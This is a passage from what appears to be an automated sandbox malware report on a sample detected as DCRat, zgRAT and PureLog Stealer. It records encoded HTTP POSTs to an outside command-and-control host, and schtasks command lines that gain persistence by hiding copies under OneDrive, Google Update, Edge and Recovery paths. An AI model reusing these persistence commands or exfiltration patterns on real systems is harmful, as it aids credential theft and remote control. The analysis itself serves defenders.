                                                        Oct 30, 2024 05:24:11.372715950 CET1076OUTData Raw: 57 5e 5c 5d 50 5f 53 52 58 57 50 59 55 59 5b 5a 54 5c 5c 55 59 5d 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\]P_SRXWPYUY[ZT\\UY]Z]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,>()0>7.& _%</:[ 4&*+()\$./: F$,Z*!
                                                        Oct 30, 2024 05:24:11.606013060 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:11.904074907 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tY0yuv9gNNLE19GW3BeQcYEs%2FWEUL5SyvLAb5WWvNdx2Id%2F2JRPsGXNYpgL0yaCTJbbTrRdZqTfcsJMrrEDLmDZ1OMGq2TQZew3RcLAHeDoMrAkep%2BYk0y2Qz7zdwxU%2BM8G94tM4QtU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2603abc2e18-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1251512&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        148192.168.2.450151188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:12.032974958 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:12.386756897 CET1076OUTData Raw: 57 50 59 51 50 5f 56 51 58 57 50 59 55 5b 5b 52 54 5f 5c 5c 59 5c 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYQP_VQXWPYU[[RT_\\Y\Z]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_/3!(8&3=.3$. 87"*/Z2Y<&*38.: F$,Z*)
                                                        Oct 30, 2024 05:24:12.640022993 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:12.875405073 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxFx%2FD0bmmi4Ig7Uh1rff%2FLJ%2BQeIe8cGHipi3gQC5LCjjwwrtAAGFKlcJ%2BTJ4rIaI2Q%2Bmmw9ukKdaqhMt0powilz2klVuqmumvxcSpxiFEkf6D0Lrrrcz2yn9JryDI922rejee37bCo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a266aefa4746-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1042&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1310407&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        149192.168.2.450152188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:13.008143902 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:13.442291021 CET1076OUTData Raw: 52 57 5c 50 55 54 53 55 58 57 50 59 55 5c 5b 5e 54 59 5c 54 59 52 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RW\PUTSUXWPYU\[^TY\TYRZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/*\<(Z07A9%.;;\;4%\+908/: F$,Z*5
                                                        Oct 30, 2024 05:24:13.614451885 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:13.880127907 CET800INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITBZhYZbZGF8RGuw4fbiPak%2F%2FNhT%2FTE4zuewueG%2B62ZvRpcaAigkyMtzQ6c%2B35m13fd65RrNCm%2BlISnTL%2FGZgQmfBCLzvOyASPNMIE%2BvFVU4CeRqMr%2B5T9ZZyh70eMh%2F80Fkmv0OGBE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a26cb8dc3ab0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1371212&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:24:13.880150080 CET800INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITBZhYZbZGF8RGuw4fbiPak%2F%2FNhT%2FTE4zuewueG%2B62ZvRpcaAigkyMtzQ6c%2B35m13fd65RrNCm%2BlISnTL%2FGZgQmfBCLzvOyASPNMIE%2BvFVU4CeRqMr%2B5T9ZZyh70eMh%2F80Fkmv0OGBE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a26cb8dc3ab0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1371212&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:00:21:57
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                                                        Imagebase:0xfa0000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
                                                        Imagebase:0x240000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 66%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:7
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
                                                        Imagebase:0xf30000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 66%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x800000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
                                                        Imagebase:0x7ff6ba420000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:23
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7bf690000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:24
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff607770000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:25
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Imagebase:0x80000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:26
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Imagebase:0xef0000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:27
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                                        Imagebase:0xf10000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:true

                                                        General

                                                        Target ID:28
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                                        Imagebase:0xac0000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:29
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Recovery\StartMenuExperienceHost.exe
                                                        Wow64 process (32bit):false
